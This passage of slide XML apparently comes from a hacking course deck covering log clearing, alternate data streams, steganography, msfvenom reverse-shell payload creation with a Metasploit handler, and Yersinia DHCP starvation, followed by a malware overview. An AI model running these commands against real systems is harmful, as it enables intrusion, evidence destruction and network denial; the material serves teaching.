            <a:r>
              <a:rPr lang="en"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>uditpol \\ip /clear</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And many tools like Dump Event Log, ELSave, Winzapper, CCleaner, Wipe, MRU-BLaster, Tracks Eraser Pro, Clear My History</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>On Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>unset HISTFILE, delete .bash_history</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/var/log/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Space, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And you have be aware of specific log files related to your activities and softwares you are attacking to</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="9144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9"/>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Hiding</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55" name="Google Shape;355;p59"/>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You may need places to hide your data on servers. Flagging hidden, strange places, … but on windows there is also Alternate Data Stream (part of NTFS); originally created to be used alongside  Apple.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ype triforce.exe &gt; smoke.doc:triforce.exe #hides triforce in smoke</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>tart smoke.doc:triforce</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>detected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> by softwares like “Sfind”, “LNS”, “TripWire”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="158333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DFDFDF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="333333"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>steghide embed -cf picture.jpg -ef secret.txt</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="DFDFDF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="333333"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="158333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="DFDFDF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="333333"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>steghide extract -sf picture.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="DFDFDF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="333333"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="16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6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msfvenom</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61" name="Google Shape;361;p60"/>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t>To create payloads “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.117 LPORT=1234 --format=exe &gt; attack.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” and then serve it on a website :D</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt; msfconsole</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt; db_staus</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use exploit/multi/handler</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set payload windows/meterpreter/reverse_tcp</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set LHOST 192.168.0.117</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set LPORT 1234</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exploit -j -z</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RUN</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sessions -i</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sessions -i 1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt; cd, ls, pwd, sysinfo, ipconfig, getuid, cat, timestomp, </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consola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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574350" y="6283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Bonus! Yersinia</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67" name="Google Shape;367;p61"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Used for DHCP Starvation Attack. We send too many Discovers and ips are exhausted. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ersinia -G</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Try the DHCP tab and Launch the Attack and go for Send Discover. Now no one can use this DHCP anymore and you can run your own DHCP.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defenses? Say on layer two (switch) you can turn the Port Security on. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="368" name="Google Shape;368;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560362" y="1577000"/>
            <a:ext cx="2945175" cy="279392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6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Malwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>re (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Malicious Software)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p62"/>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rgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instant messages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Removable devices (USBs on streets or defcon!)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Email attachments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trojan Horses (shrink wrapped)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File sharing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fake programs (Virus detected! Click here!)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Downloading things from internet (better SEOing popular sites/softwares)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Drive-by download (automatic dls)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Covert Channels (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>unknown, unmonitored components of a system that can be exploited)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792550" y="2081550"/>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rgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Theft</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Types</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Virus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trojan Horses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Back Doors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spyware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Botnets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RansomWare</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Adware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Logic bombs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
